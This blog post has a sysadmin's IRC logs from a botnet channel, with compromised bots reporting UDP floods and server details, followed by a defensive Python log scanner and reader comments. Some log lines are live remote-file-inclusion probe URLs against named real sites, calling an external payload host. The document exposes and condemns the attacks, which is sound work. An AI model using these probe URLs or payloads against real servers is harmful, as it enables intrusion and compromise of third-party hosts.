<[A]k0d6308> [UdpFlood Started!]
<[A]k0d0908> [UdpFlood Started!]
<[A]k0d3100> [UdpFlood Started!]
<[A]k0d1665> [UdpFlood Started!]
<[A]k0d9886> [UdpFlood Started!]
<[A]k0d4132> [UdpFlood Started!]
<[A]k0d3702> [UdpFlood Started!]
<[A]k0d7121> [UdpFlood Started!]
<[A]k0d2290> [UdpFlood Started!]
<[A]k0d7036> [UdpFlood Started!]
<[A]k0d8826> [UdpFlood Started!]
<[A]k0d4398> [UdpFlood Started!]
<[A]k0d0577> [UdpFlood Started!]
<[A]k0d7913> [UdpFlood Started!]
<[A]k0d5371> [UdpFlood Started!]
<[A]k0d9931> [UdpFlood Started!]
<[A]k0d9618> [UdpFlood Started!]
<[A]k0d9824> [UdpFlood Started!]
<[A]k0d4017> [UdpFlood Started!]
<[A]k0d8109> [UdpFlood Started!]
<[A]k0d7027> [UdpFlood Started!]
<[A]k0d1153> [UdpFlood Started!]
<[A]k0d8421> [UdpFlood Started!]
<[A]k0d7677> [UdpFlood Started!]
<[A]k0d0401> [UdpFlood Started!]
<[A]k0d3180> [UdpFlood Started!]
<[A]k0d5556> [UdpFlood Started!]
<[A]k0d4455> [UdpFlood Started!]
<[A]k0d0920> [UdpFlood Started!]
<[A]k0d4804> [UdpFlood Started!]
<[A]k0d0825> [UdpFlood Started!]
<[A]k0d4164> [UdpFlood Started!]
<[A]k0d9100> [UdpFlood Started!]
<[A]k0d5564> [UdpFlood Started!]
<[A]k0d4880> [UdpFlood Started!]
<[A]k0d6126> [UdpFlood Started!]
I only began logging halfway through. The above is actually a buffer save from the active window (the channel). I added timestamps to aid anyone wanting time orientation.
Jul 08 20:04:26 * [A]k0d4132 has quit (Connection reset by peer)
Jul 08 20:04:42 * [A]k0d9824 has quit (Connection reset by peer)
Jul 08 20:04:53 * [A]k0d4398 has quit (No route to host)
Jul 08 20:05:00 * [A]k0d1665 has quit (Connection reset by peer)
Jul 08 20:05:12 * Azimuth gives voice to [A]k0d0943 [A]k0d3957 [A]k0d5821 [A]k0d7746 [A]k0d8278 [A]k0d8908
Jul 08 20:05:22 <[A]k0d4017> [UdpFlood Finished!]: 118 MB enviados / Media: 1 MB/s
Jul 08 20:05:22 <[A]k0d0825> [UdpFlood Finished!]: 28976 MB enviados / Media: 241 MB/s
Jul 08 20:05:22 <[A]k0d8109> [UdpFlood Finished!]: 6815 MB enviados / Media: 57 MB/s
Jul 08 20:05:22 <[A]k0d9886> [UdpFlood Finished!]: 22819 MB enviados / Media: 190 MB/s
Jul 08 20:05:22 <[A]k0d9931> [UdpFlood Finished!]: 18856 MB enviados / Media: 157 MB/s
Jul 08 20:05:22 <[A]k0d7027> [UdpFlood Finished!]: 2167 MB enviados / Media: 18 MB/s
Jul 08 20:05:23 <[A]k0d5821> [UdpFlood Finished!]: 2644 MB enviados / Media: 22 MB/s
Jul 08 20:05:23 <[A]k0d8826> [UdpFlood Finished!]: 17208 MB enviados / Media: 143 MB/s
Jul 08 20:05:23 <[A]k0d7746> [UdpFlood Finished!]: 6889 MB enviados / Media: 57 MB/s
Jul 08 20:05:23 <[A]k0d7677> [UdpFlood Finished!]: 16404 MB enviados / Media: 137 MB/s
Jul 08 20:05:23 <[A]k0d4455> [UdpFlood Finished!]: 11683 MB enviados / Media: 97 MB/s
Jul 08 20:05:23 <[A]k0d4804> [UdpFlood Finished!]: 456 MB enviados / Media: 4 MB/s
Jul 08 20:05:23 <[A]k0d8908> [UdpFlood Finished!]: 14373 MB enviados / Media: 120 MB/s
Jul 08 20:05:23 <[A]k0d8278> [UdpFlood Finished!]: 14709 MB enviados / Media: 123 MB/s
Jul 08 20:05:23 <[A]k0d9618> [UdpFlood Finished!]: 6313 MB enviados / Media: 53 MB/s
Jul 08 20:05:23 <[A]k0d0577> [UdpFlood Finished!]: 41879 MB enviados / Media: 349 MB/s
Jul 08 20:05:23 <[A]k0d3702> [UdpFlood Finished!]: 477 MB enviados / Media: 4 MB/s
Jul 08 20:05:23 <[A]k0d3180> [UdpFlood Finished!]: 37874 MB enviados / Media: 316 MB/s
Jul 08 20:05:24 <[A]k0d5564> [UdpFlood Finished!]: 279 MB enviados / Media: 2 MB/s
Jul 08 20:05:24 * [A]k0d5534 (~k0d6528@995C4AF2.3E333E34.33EE78D3.IP) has joined ##cinestar
Jul 08 20:05:24 <[A]k0d0908> [UdpFlood Finished!]: 19471 MB enviados / Media: 162 MB/s
Jul 08 20:05:25 <[A]k0d8421> [UdpFlood Finished!]: 14271 MB enviados / Media: 119 MB/s
Jul 08 20:05:25 * [A]k0d3100 has quit (Connection reset by peer)
Jul 08 20:05:25 * [A]k0d4001 (~k0d9875@970AFCB4.2F45E854.E340ABB2.IP) has joined ##cinestar
Jul 08 20:05:26 <[A]k0d7913> [UdpFlood Finished!]: 16570 MB enviados / Media: 138 MB/s
Jul 08 20:05:29 <[A]k0d0943> [UdpFlood Finished!]: 8290 MB enviados / Media: 69 MB/s
Jul 08 20:05:31 <[A]k0d6126> [UdpFlood Finished!]: 900 MB enviados / Media: 7 MB/s
Jul 08 20:05:40 * [A]k0d8918 (~k0d0497@634CB9B7.EC4A613B.6711F1E0.IP) has joined ##cinestar
Jul 08 20:05:43 * Azimuth gives voice to [A]k0d4001 [A]k0d5534
Jul 08 20:05:46 <[A]k0d4880> [UdpFlood Finished!]: 15371 MB enviados / Media: 128 MB/s
Jul 08 20:05:50 <Azimuth> .user tic
Jul 08 20:05:52 * [A]k0d7586 (~k0d0520@73DB61AD.CA44201E.8406420.IP) has joined ##cinestar
Jul 08 20:06:04 <Azimuth> .user tic
Jul 08 20:06:13 <Azimuth> .raw join ##kbyte
Jul 08 20:06:23 * [A]k0d7036 has quit (Ping timeout)
Jul 08 20:06:28 * [A]k0d0920 has quit (Ping timeout)
Jul 08 20:07:03 * Azimuth gives voice to [A]k0d7586 [A]k0d8918
Jul 08 20:08:34 * [A]k0d1789 (~k0d1704@OltreIrc-AB2C89C9.ev.vnu.edu.tw) has joined ##cinestar
Jul 08 20:09:08 <[A]k0d4880> [info]: Linux fruela 2.6.15-52-386 #1 PREEMPT Mon Jun 9 17:24:46 UTC 2008 i686 (safe: off)
Jul 08 20:09:08 <[A]k0d4880> [vuln]: http://www.moterosastures.es//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT%5BADMIN_PATH%5D=http://www.diving-thailand-phuket.com/echo.txt??
Jul 08 20:09:30 * Azimuth gives voice to [A]k0d1789
Jul 08 20:09:54 <Azimuth> .user tic
Jul 08 20:09:54 -[A]k0d7586/##cinestar- [Auth]: Senha errada Azimuth idiota!!
Jul 08 20:09:59 <Azimuth> .user plz
Jul 08 20:10:03 <Azimuth> .user net
Jul 08 20:10:06 <Azimuth> .raw join ##kbyte
Jul 08 20:10:29 <[A]k0d1789> [info]: Windows NT EVBBS 5.1 build 2600 (safe: off)
Jul 08 20:10:30 <[A]k0d1789> [vuln]: http://bbs.ev.vnu.edu.tw/phpbb2/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
Jul 08 20:11:40 <Azimuth> [A]k0d2888 .info
Jul 08 20:11:52 <Azimuth> .user rdh
Jul 08 20:11:56 <Azimuth> .user net
Jul 08 20:12:00 <Azimuth> .user plz
Jul 08 20:12:02 <Azimuth> .user tic
Jul 08 20:12:22 <Azimuth> [A]k0d2888 .info
Jul 08 20:12:27 <Azimuth> [A]k0d2888 .die
Jul 08 20:12:35 * Azimuth sets ban on *!*@FF22E601.C1DCD0DB.CCB009B8.IP
Jul 08 20:12:42 * Azimuth has kicked [A]k0d2888 from ##cinestar (Azimuth)
Jul 08 20:13:20 <Azimuth> [A]k0d7586 .info
Jul 08 20:15:09 * [A]k0d7586 has quit (Ping timeout)
Jul 08 20:19:31 <Azimuth> .uname
Jul 08 20:19:31 <[A]k0d9931> [info]: Linux www29.celeonet.fr 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d9886> [info]: Linux web2-sh 2.6.15-51-386 #1 PREEMPT Thu Dec 6 20:20:49 UTC 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d5821> [info]: Linux unicon02 2.6.11.9-050512a #1 SMP Thu May 12 20:53:02 CEST 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d0577> [info]: Linux central.bearlounge.net 2.6.9-55.0.12.ELsmp #1 SMP Fri Nov 2 11:19:08 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d9618> [info]: FreeBSD gkvcyclingteam.org 6.3-STABLE FreeBSD 6.3-STABLE #2: Mon Jun 9 03:18:45 CEST 2008 root@dione.ispsystem.net:/root/src/sys/i386/compile/ISPSYSTEM_PAE i386 (safe: off)
Jul 08 20:19:31 <[A]k0d3702> [info]: Windows NT WEBSERVER2000 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d8826> [info]: Linux crf.ecritel.net 2.4.31 #1 SMP Wed Aug 3 14:42:21 CEST 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4001> [info]: FreeBSD server.brightlightmedia.co.uk 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Sun May 7 04:42:56 UTC 2006 root@opus.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP i386 (safe: off)
Jul 08 20:19:31 <[A]k0d0908> [info]: Linux europe03.puhtek.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d8918> [info]: FreeBSD dl380.hppc.co.uk 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov 3 09:36:13 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
Jul 08 20:19:31 <[A]k0d7913> [info]: Linux ISICHt 2.4.32 #1 Thu Nov 17 20:24:16 CET 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d5534> [info]: FreeBSD ns2.chmr.ru 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov 3 09:36:13 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
Jul 08 20:19:31 <[A]k0d7027> [info]: Linux evadne.site5.com 2.6.9-67.0.15.ELsmp #1 SMP Thu May 8 10:52:19 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4880> [info]: Linux fruela 2.6.15-52-386 #1 PREEMPT Mon Jun 9 17:24:46 UTC 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d6126> [info]: Windows NT TOMKORPWEB 5.1 build 2600 (safe: off)
Jul 08 20:19:31 <[A]k0d8109> [info]: Linux host.queo.com.mx 2.6.18-92.1.6.el5 #1 SMP Wed Jun 25 13:49:24 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d3180> [info]: Linux beast.colnetwork.com 2.6.18-53.el5PAE #1 SMP Wed Oct 10 16:48:18 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d7746> [info]: Linux vps.theleftorium.com 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d0825> [info]: Linux server10.proaxxs.net 2.6.9-67.0.15.ELsmp #1 SMP Thu May 8 10:52:19 EDT 2008 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d7677> [info]: Linux server.doralhosting.net 2.6.9-55.ELsmp #1 SMP Wed May 2 14:28:44 EDT 2007 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d8421> [info]: Darwin LT.Web.Server 9.4.0 Darwin Kernel Version 9.4.0: Mon Jun 9 19:30:53 PDT 2008; root:xnu-1228.5.20~1/RELEASE_I386 i386 (safe: off)
Jul 08 20:19:31 <[A]k0d4017> [info]: Windows NT BAAL 5.2 build 3790 (safe: off)
Jul 08 20:19:31 <[A]k0d5564> [info]: Windows NT SERVER 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d1789> [info]: Windows NT EVBBS 5.1 build 2600 (safe: off)
Jul 08 20:19:31 <[A]k0d8278> [info]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4804> [info]: Windows NT SCY-01 5.0 build 2195 (safe: off)
Jul 08 20:19:31 <[A]k0d8908> [info]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
Jul 08 20:19:31 <[A]k0d4455> [info]: Linux host02.wotonet.com 2.4.36-WOTO080129.V1 #2 SMP Tue Jan 29 12:16:58 KST 2008 i686 (safe: off)
Jul 08 20:19:32 <[A]k0d0943> [info]: Linux w45.pooding.com 2.4.31-2 #1 SMP Tue Jul 26 17:15:34 KST 2005 i686 (safe: off)
Jul 08 20:20:56 <Azimuth> .raw join ##kbyte
Jul 08 20:21:04 <Azimuth> .raw part ##cinestar
Jul 08 20:21:04 * [A]k0d0908 (~k0d7369@OltreIrc-CE63C3EE.dnayritysnetti.net) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8826 (~k0d3118@OltreIrc-E3995A08.croix-rouge.fr) has left ##cinestar
Jul 08 20:21:04 * [A]k0d4001 (~k0d9875@970AFCB4.2F45E854.E340ABB2.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d5821 (~k0d3952@OltreIrc-DC0CB93C.de) has left ##cinestar
Jul 08 20:21:04 * [A]k0d9886 (~k0d3835@OltreIrc-CECC1CBA.atwork.nl) has left ##cinestar
Jul 08 20:21:04 * [A]k0d0577 (~k0d6355@OltreIrc-9BBE6E0E.bearlounge.net) has left ##cinestar
Jul 08 20:21:04 * [A]k0d7913 (~k0d6003@OltreIrc-F23848CF.be) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8918 (~k0d0497@634CB9B7.EC4A613B.6711F1E0.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d9931 (~k0d4325@OltreIrc-5B50CDF7.celeonet.fr) has left ##cinestar
Jul 08 20:21:04 * [A]k0d9618 (~k0d3084@OltreIrc-684192CD.org) has left ##cinestar
Jul 08 20:21:04 * [A]k0d3702 (~k0d2155@OltreIrc-320D8684.afrikanergasse.xdsl-line.inode.at) has left ##cinestar
Jul 08 20:21:04 * [A]k0d4017 (~k0d6102@FBFD3075.A15CBB26.6D3D4946.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d4880 (~k0d0556@OltreIrc-9790B58D.telecable.es) has left ##cinestar
Jul 08 20:21:04 * [A]k0d7027 (~k0d1629@OltreIrc-256CCF12.site5.com) has left ##cinestar
Jul 08 20:21:04 * [A]k0d5534 (~k0d6528@995C4AF2.3E333E34.33EE78D3.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8109 (~k0d2220@958957D9.99230A91.8B13B0E8.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8421 (~k0d1756@DB22263.98BBD98C.48892EB1.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d7677 (~k0d4880@OltreIrc-70B26461.net) has left ##cinestar
Jul 08 20:21:04 * [A]k0d6126 (~k0d4006@OltreIrc-32567AD5.wp.shawcable.net) has left ##cinestar
Jul 08 20:21:04 * [A]k0d0825 (~k0d6278@OltreIrc-A935EFC.static.reverse.ltdomains.com) has left ##cinestar
Jul 08 20:21:04 * [A]k0d3180 (~k0d5484@D8D04E5D.AA93C9D.130AD98B.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d7746 (~k0d6619@EE3ACF2A.F0FE8B70.F93FFA4D.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d1789 (~k0d1704@OltreIrc-AB2C89C9.ev.vnu.edu.tw) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8278 (~k0d1123@7F26F4C3.9717B992.2A42257.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d8908 (~k0d5189@7F26F4C3.9717B992.2A42257.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d0943 (~k0d1303@504C739A.99FFEA55.F7DAF277.IP) has left ##cinestar
Jul 08 20:21:04 * [A]k0d4455 (~k0d6874@OltreIrc-AD35EFB5.wotonet.com) has left ##cinestar
Jul 08 20:21:04 * [A]k0d4804 (~k0d6984@OltreIrc-E791C985.adsl.static.ttn.net) has left ##cinestar
Jul 08 20:21:04 * [A]k0d5564 (~k0d5000@EEE23E15.6157A1E5.1E1D14E7.IP) has left ##cinestar
Jul 08 20:21:23 <Azimuth> .user plz
**** ENDING LOGGING AT Tue Jul 8 20:21:49 2008
As you noticed above, I actually spoke and someone answered me. Not knowing whether this was the person responsible for the whole mess, I had a small chat with him/her, logged below for your reading pleasure. Note that I changed my nickname to <[A]k0d3957> at some point in this conversation.
<k0d1237> are you part of this stupid story or are you an admin that just happened to see the logs ?
<[A]k0d5823> No I am not part of this story
<[A]k0d5823> I saw those attempts on my apache logs, and wanted to see, what that script does
<k0d1237> crazy shit init
<k0d1237> ill be posting this somewhere so I can laugh my head off later.
<[A]k0d5823> yep
<[A]k0d5823> but join on ##cinestar
<k0d1237> invite only
<k0d1237> the key doesnt work , the one i found in the script
<[A]k0d5823> but if you put your nick like me, you can come there
* Cannot join ##cinestar (Channel is invite only).
<k0d1237> hmm
<k0d1237> hold on
<[A]k0d3957> better ?
<[A]k0d5823> and then join on ##cinestar
<[A]k0d3957> i bet your the guy that did this
<[A]k0d3957>
<[A]k0d5823> Nope
<[A]k0d3957> Luckily enough I didn’t get compromised
<[A]k0d3957> hope you didn’t
<[A]k0d5823> I am running a finnish site that offers how to make differend drinks
<[A]k0d3957> whats the site ?
<[A]k0d5823> and i have a phpbb there
<[A]k0d5823> http://nettibaari.shotti.fi
<[A]k0d5823> entral.bearlounge.net - - [08/Jul/2008:18:29:49 +0300] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.diving-thailand-phuket.com/echo.txt?? HTTP/1.1" 404 402 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
<[A]k0d5823> +c on the beginning
<[A]k0d5823> Just wondering, where could I report of this…?
<[A]k0d3957> to the police ?
<[A]k0d5823> I just wonder if a finnish police is interested of this
<[A]k0d3957> i wouldnt know
<[A]k0d3957> im just a bot from a hacked server
<[A]k0d3957>
<[A]k0d5823> hehe
<[A]k0d3957> im going to be posting this on the net , its quite funny
<[A]k0d5823> I wrote to Finnish Communications Regulatory Authority (FICORA) and asked, if they are interested
<[A]k0d5823> at least they now where should I report this
<[A]k0d3957> could you cc me the mail ?
<[A]k0d3957> i might consider reporting this in cyprus too
<[A]k0d5823> I did it already, and wrote it in finnish, so it would not help you much
<[A]k0d3957> oh
<[A]k0d5823> But if they want me to report somewhere else, then i could cc it
<[A]k0d5823> I am just collectin the information of this system
<[A]k0d3957> do a /who ##cinestar and paste it to them
<[A]k0d5823> Yep, I took it already
<[A]k0d5823> /who * in fact
So in parallel I did join the channel ##kbyte as the guy mentioned. How did he know about kbyte? Strangely enough, he couldn’t possibly have unless he was part of it. I got banned by an IRCOp who seemed to be part of this and who simply realized that I wasn’t an attack bot. He accomplished this by parting all bots with a .part command, which they responded to. I was busy looking up stuff and didn’t have time to play along and part (and join another channel, which they stated), so I was the only “bot” in the channel. Unfortunately they realized this and gave me the boot. The fact that I was G-Lined from this server leads us to believe that the IRCOps are in on it.
Jul 08 20:22:12 * *** You are permanently banned from OltreIrc (no reason)
Jul 08 20:22:12 * Closing Link: [A]k0d3957[86-102.netway.com.cy] (User has been permanently banned from OltreIrc (no reason))
Jul 08 20:22:12 * Disconnected (Remote host closed socket).
Anyhow, from the logs you can conclude that this was script kiddies having some “fun”. I condemn behavior like this, since I administer machines all day long and people who try to mess things up for me aren’t going in my good books. In my career as a system and network admin I’ve had 1 (one) intrusion, and that was on the application layer, in a chroot environment, and it wasn’t even something I had set up in the first place.
There isn’t much else to say. If you feel like doing some enumeration and investigation, do so; I don’t care and neither do the authorities in Cyprus. Nevertheless it was a painless story and it put a laughing smile on my face this afternoon. I hope the script kiddies in the future become ever so intuitive just so I don’t stop laughing.
I suggest that administrators who have had issues like this, or who are any of the above from the log, get to work and patch stuff, including OS and software, since security is a process which must be followed on a higher layer than ethics and religion itself!! If you are unable to maintain security, consider hiring me, or something like me.
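The probes quoted in this post share one shape: a query parameter (`include_path`, `mosConfig_absolute_path`) whose value is a remote URL padded with trailing `?`. As an added example (not part of the original post), this Python script finds that shape in Apache access logs and groups the hits by payload URL; the sample lines are constructed, and `payload.example` and the `page` parameter are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Apache common/combined format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A query parameter whose value is itself a remote URL is the probe signature.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one record per query parameter that carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read a target that starts with "//"
        # (as in the //administrator/... probe) as a network location.
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):  # parse_qsl has already percent-decoded it
                hits.append({
                    "client": m["host"], "time": m["time"], "path": path,
                    "param": name, "status": int(m["status"]),
                    "payload": value.rstrip("?"),  # drop the "??" padding
                })
    return hits

def group_by_payload(hits):
    """Map payload URL -> sorted parameter names that were tried with it."""
    groups = defaultdict(set)
    for h in hits:
        groups[h["payload"]].add(h["param"])
    return {url: sorted(params) for url, params in groups.items()}

# Constructed sample lines (documentation addresses, placeholder payload host).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2008:17:47:59 +0300] "GET /?include_path=http://payload.example/echo.txt?? HTTP/1.1" 200 5120 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"',
    '192.0.2.11 - - [08/Jul/2008:18:29:49 +0300] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://payload.example/echo.txt?? HTTP/1.1" 404 402 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"',
    '192.0.2.12 - - [08/Jul/2008:18:31:02 +0300] "GET /index.php?page=http%3A%2F%2Fpayload.example%2Ftest.txt%3F%3F%3F HTTP/1.1" 200 5120 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"',
    '198.51.100.7 - - [08/Jul/2008:18:40:11 +0300] "GET /?s=irc+bots HTTP/1.1" 200 7340 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for url, params in group_by_payload(find_rfi_probes(SAMPLE_LOG)).items():
        print(url, params)
```

A legitimate parameter that carries a full URL (a redirect target, for instance) matches as well, so review the hits grouped by payload URL rather than blocking on the pattern alone.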
Wow man. You sure did give it a lot of attention. That was the longest blog post I read in a while.

Personally I never had the stamina to investigate all these attempts… as you mentioned, there is close to zero chance to catch anyone. But you actually managed to get some fun out of it.
I just had some free time in the afternoon really and thought it would be super funny if I pretended to be a bot. They even launched an attack right in front of me and I wanted to fall off of the chair laughing.
Vladimir, it looks like you haven’t been updating your blog. What’s the matter? Cat got your keystrokes?
You usually post interesting things so get on with it
So, if you are handcuffed like me, with shared hosting, how can I get the admins to help me block these? It keeps overwriting the home pages with an activeX virus put in after the tags
Hi David, it looks like you have an issue regarding the files on your site and not something that requires the admin’s intervention. Could you tell me though more on your setup and what happens exactly. The brief explanation doesn’t help me much.
Hi Mario, these guys might be Brazilians, since the bots reply in Portuguese, as in “-[A]k0d4455/##cinestar- [Auth]: Senha errada Azimuth idiota!!”, which means “wrong password Azimuth, asshole!!”, and also “12424MB enviados / Media”, in which “enviados” means “sent”. Nice tracking anyway.
Hi,
Some parts of this script were really developed by me, I was not more I tried to run this script on your server.
I only wrote the script. After that, several people changed it and used it for their own use, as in the log that you just posted.
Regards
If you need anything, contact me by email
Really, I wouldn’t go around the Internet saying you wrote anything of the sort
but yeah, okay, just please don’t DDoS me again please; if possible leave the Internet alone with its already messed up flow of packets